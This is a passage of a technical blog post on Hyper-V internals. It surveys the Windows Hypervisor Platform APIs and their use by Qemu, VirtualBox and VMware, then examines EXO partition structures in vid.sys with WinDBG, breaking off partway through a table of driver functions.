<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These APIs have been available on Windows 10 since build 1803 (April 2018 update). Almost 2.5 years have passed since development of VBS and the realization, that the technology blocks third-party virtualization applications.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, in the context of these APIs, Windows Hypervisor Platform (WHPX) term is used - it is a Windows component of upon activation of which specified APIs become available. “X” seems to be implied as executable (similar to HAXM - Intel Hardware Accelerated Execution Manager), probably because the API was tested on Qemu first), or simply from word “accelerator”. </span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 21.3pt; margin-top: 0pt; text-indent: 14.099999999999998pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="282" src="https://lh5.googleusercontent.com/HA53WssQOqqijrfsCSCaXiqDBK5xDuvkgzEH2JHN669k-CB5H8zV2WbUk-CuJK0eGj0aGkKUoypbJ7vGWsqXkDAjaZKuC8ZGtfN_sup-XaVhWzhq_iw8sb96E8u65MbCUOAJ8SsePf1CIq_MsA" style="margin-left: 0px; margin-top: 0px;" width="320" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For Full VMs and containers like Windows Sandbox, WDAG or Microsoft Emulator (using to run virtual images with Windows 10 X), standard Microsoft APIs exported by vid.dll are used.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Qemu emulator is the first, for which Microsoft itself developed the WHPX acceleration module, demonstrating that their APIs are functional.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then Oracle VirtualBox developers finalized their solution, so that it worked together with Hyper-V in Windows versions 1809, but after a while it broke (Microsoft blocked the execution of some functions of the vid.sys driver for partitions, created using the WHVP API).</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In January 2020, VMware announced VMware Workstation 20H1 preview build, working in conjunction with Hyper-V, but whose performance was quite low. On May 28, 2020, version 15.5 was released and it supports working with Hyper-V enabled in the OS host. It is worth mentioning, that VMware significantly redesign VMware Workstation for integration with WHVP API:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 21.3pt; margin-top: 0pt; text-indent: 14.099999999999998pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="137" src="https://lh5.googleusercontent.com/87Dg8YQSve08IDa1f_GUj1SyNgClxYngHen-iaOE7UUxsd3JIvDHBhRnyVq2jo9vaMoSHK6ALXwUEi_kExNX3jqayEPLyycCiUb8gbt15npH6uzXh0Vc_y7Lr6W7c_Y3F6t7lbwKpOyOfjGSbA" style="margin-left: 0px; margin-top: 0px;" width="320" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And at the same time, nested virtualization supporting was lost, if Hyper-V was activated in root OS. If remember, VMware was one of the first companies, which adding nested virtualization subsystem to its software (it was added to VMware Workstation 8 in 2011). Information, when nested virtualization feature will be available for root OS, is not yet available. At the time of publication, there are some discussions about a rather large decrease in VMware performance, when using WHVP API, but I hope this problem will be solved. But don’t forget, that VMware and VirtualBox are essentially competitive solutions for Windows Sandbox\WSL\Hyper-V in Windows 10.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 21.3pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WHVP API are currently used in:</span><br />
<ul style="text-align: left;">
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Android emulator from Google: </span></span></li>
</ul>
<span style="color: #0000ee; font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><u>https://docs.microsoft.com/ru-ru/xamarin/android/get-started/installation/android-emulator/hardware-acceleration?pivots=windows</u></span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><a href="https://developer.android.com/studio/run/emulator-acceleration#vm-windows-whpx">https://developer.android.com/studio/run/emulator-acceleration#vm-windows-whpx</a></span></span><br />
<ul style="text-align: left;">
<li><span style="font-family: "calibri" , sans-serif; font-size: 10.6667px; text-indent: 21.3pt;">Applepie - A Hypervisor For Fuzzing Built With WHVP And Bochs: </span><a href="https://github.com/gamozolabs/applepie/tree/master/whvp_bindings" style="font-family: calibri, sans-serif; font-size: 10.6667px; text-indent: 21.3pt;">https://github.com/gamozolabs/applepie/tree/master/whvp_bindings</a></li>
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Qemu;</span></span></li>
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VirtualBox 6.xx (partially);</span></span></li>
<li><span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VMware Workstation 15.5 (and 20H2 Preview).</span></span></li>
</ul>
</div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VirtualBox have problems after Windows 10 1903 release, and (we will see it below) now they don’t use part of these WHVP API, replacing them with their own mechanism, because WHVP API are designed only for user mode. VirtualBox still can’t fully utilize them due to the kernel mode components used during operation. VMware had to do a lot of work and lose some functionality. There are performance complaints.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In fact, we can say that the API can be used effectively only in usermode (Qemu, Bochs).</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Microsoft defense, I can say, that API, exported by the vid.dll, are changed every six months, when a new version of Windows is released, and even when monthly cumulative updates are released. Below we can see list of functions, exported by vid.dll depending of Windows version. As you can see, the list of changes is significant, especially for Windows server versions, and we can only guess about functions parameters changing. For third-party developers, this kind of changes is unacceptable in any case.</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: left;">
<span style="border: none; display: inline-block;"><img height="640" src="https://lh5.googleusercontent.com/Qt9JLieWdVJJsWcXnrBTcotwO3TvCkMj6S3R8t2yKG2zNLp6tZM23Nh5jH3EbZE8hL3W7zE0MDwvmGgi-Dm2RrPgGic-a84hd14cUf5V4fYXFj19a8c7IK6cBIkq9rkrtLla5s-g-ka2d2t1Xg" style="margin-left: 0px; margin-top: 0px;" width="336" /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="border: none; display: inline-block;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh3.googleusercontent.com/TU_h_WmqGPzeY-deJxPiDJXEnP277Mb9GUuQpmtQl-1R6baAJXc9j4BLOuXAzcYft4zeZIpPmh2qlXHy2pxjb41uWzL5tyRIW078_doyyL6EszmNGwSucAXOGXyLAodlhQoDFlMfypMqkw5ZBg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="https://lh3.googleusercontent.com/TU_h_WmqGPzeY-deJxPiDJXEnP277Mb9GUuQpmtQl-1R6baAJXc9j4BLOuXAzcYft4zeZIpPmh2qlXHy2pxjb41uWzL5tyRIW078_doyyL6EszmNGwSucAXOGXyLAodlhQoDFlMfypMqkw5ZBg" style="margin-top: 0px;" width="427" /></a><span style="border: none; display: inline-block;"></span></div>
</div>
</div>
<div style="text-align: left;">
<br /></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><span style="font-size: 8pt; text-indent: 28.35pt;">The situation for WHVP API is much more stable, which is generally logical for public APIs:</span></span></span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><span style="font-size: 8pt; text-indent: 28.35pt;"><br /></span></span></span></div>
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh3.googleusercontent.com/7N0EY0-BTLLsdL4b6ZLb8XQbDy-oO8pYm5M8uHsDLjRVog9MthazUkFNVrgwg80tMqjkLx_OIHC9FdSMm1AJhfFu2sPuNDRWfv-aeRT2W9Yd8LzmLA0SsRK7njL5Qu8tAUxHBEnCdH4qR2xI0A" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://lh3.googleusercontent.com/7N0EY0-BTLLsdL4b6ZLb8XQbDy-oO8pYm5M8uHsDLjRVog9MthazUkFNVrgwg80tMqjkLx_OIHC9FdSMm1AJhfFu2sPuNDRWfv-aeRT2W9Yd8LzmLA0SsRK7njL5Qu8tAUxHBEnCdH4qR2xI0A" style="margin-top: 0px;" width="600" /></a></div>
<b style="font-weight: normal;"><br /></b>
</div>
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, the situation for low-level developers in the field of Hyper-V is rather complicated, and, besides, it is getting worse (even Hyper-V TLFS is updated extremely rarely - the latest update added description of nested virtualization, but information is extremely scarce, it allows you to read information about the internal structures of the hypervisor, which I did at one time using the LiveCloudKd utility (</span><a href="https://github.com/gerhart01/LiveCloudKd%D0%B1" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), but so far it turns out to be used for researching purposes - put it into practice and integrate, for example, into the debugger still doesn’t work).</span></div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But, as Satya Nadella (</span><a href="https://content.techgig.com/windows-is-no-longer-important-hints-microsoft-ceo/articleshow/71474383.cms" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://content.techgig.com/windows-is-no-longer-important-hints-microsoft-ceo/articleshow/71474383.cms</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) said, the Windows era is leaving, everyone should go to the clouds, therefore, no chance, that situation with low-level API will change in a positive direction.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's leave the theory aside and proceed to the practical part.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EXO partitions memory internals</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 x64 Enterprise 20H1 (2004) and Windows 10 x64 Enterprise 1803 (lifecycle will finish in November 2020, so information is provided only for comparison) with updates for June 2020 is used as root OSes. As a guest OS, Windows 10 x64 Enterprise 20H1 (2004) was used everywhere.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are 3 headers in Windows SDK 10.0.19041 (Windows 10 20H1 SDK):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPlatform.h</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPlatformDefs.h</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvEmulation.h</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Functions are exported by the winhvplatform.dll library and their definitions are presented in WinHvPlatform.h header file. Functions are wrappers over procedures provided by vid.dll (Microsoft Hyper-V Virtualization Infrastructure Driver Library), which calls vid.sys (Microsoft Hyper-V Virtualization Infrastructure Driver) driver services.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Briefly consider what happens when the VM starts. The source code of Qemu is available, if anyone is interested, then you can always study the working algorithms in detail:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<a href="https://github.com/qemu/qemu/blob/master/target/i386/whpx-all.c" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/qemu/qemu/blob/master/target/i386/whpx-all.c</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="font-family: "calibri" , sans-serif; font-size: 8pt; text-indent: 28.35pt;">When Qemu starts with WHPX hardware acceleration mode, two descriptors are created: \Device\VidExo. They allow get acces to mentioned kernel mode vid.sys device:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="113" src="https://lh3.googleusercontent.com/gQ5CBRwkjjKMSBn2loHadGuLjiUYxzCIIOgm-jDkg6phwfZ8oh5KcH3RRrZUyq3eX8NfSHZIiQLip78gT3n7YcGqh31aOxNq68p2yhh-1OyEIKIBYwgVtegaA9wmWg9hh2gtXX6AFvnDHUnpNQ" style="margin-left: 0px; margin-top: 0px;" width="444" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Both descriptors – file objects:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="183" src="https://lh5.googleusercontent.com/tHybLRYe7ojbyfTjy0e-1mxuhqLNjQCdyI1IcWXm4T3mOWeTI0YWZXGkvyEoBGcO65rZIDXA27FvVrSPPvsvLEoG5i78_qAYc0bD4YDFT2jv6dUYwvzUZFOWVKkQXfw8zVqpb91L5uSD-XW1KA" style="margin-left: 0px; margin-top: 0px;" width="203" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If look at each FsContext, there are different data structures, that have signatures: Exo and Prtn.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="156" src="https://lh6.googleusercontent.com/3ULBuhJnnc9JhQqxPP3LbgUWUoViKGd5CjmACGoSASmcuNehko7Vvd_stpwrks9LW6vV9j0_SiRpI_BZCV9JIBvzWUhcoiiPLRKutWgDPcOFDrTXe2-cwX6z9c0Gt6hwqXoNxWvGGl9FIj_eNA" style="margin-left: 0px; margin-top: 0px;" width="276" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Prtn-structure (VM_PROCESS_CONTEXT) was described in previous article (</span><a href="http://hvinternals.blogspot.com/2019/09/hyper-v-memory-internals-guest-os-memory-access.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://hvinternals.blogspot.com/2019/09/hyper-v-memory-internals-guest-os-memory-access.html</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Using WinDBG and pykd plugin, this structure can be parsed and meaningful elements can be shown (example for VMware Workstation 20H2 preview):</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="472" src="https://lh6.googleusercontent.com/6KB1iRIhJXirG2AVQCd3jTa-bic1McTF0CtU3XgoH_48GstTy8qIVAhWpnSbpBoKK--p72-x9HSp-1_tkCEekDJqP57MfHJ8yk9PaZ6i1tjLycF35kDIGvhjlIK-qbQaU-7rMUJ51G5hyzVByw" style="margin-left: 0px; margin-top: 0px;" width="537" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, Exo object is not registered in winhvr!WinHvpPartitionArray array (only one Prtn object is presented), i.e. is not a full partition object.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Exo object is address of vid.sys variable VidExoDeviceContext. Prtn object is created for Exo partitions doesn’t contain partition name (full VM partition has same name as VM in Hyper-V manager, containers partition has name “Virtual machine”). But GUID for EXO partition is present.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are not so many Exo functions in the kernel in the vid.sys driver:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="margin-left: -5.4pt; text-align: left;">
<table style="border-collapse: collapse; border: none; text-align: left;"><colgroup><col width="311"></col><col width="312"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 10 x64 20H1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 10 x64 1803</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> x /1 vid!*exo*</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExopAccessVaFault</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopIoControlPreProcess</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileClose</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileObjectDestroy</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopUpdateDeviceSecurity</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCleanup</span></span><br />
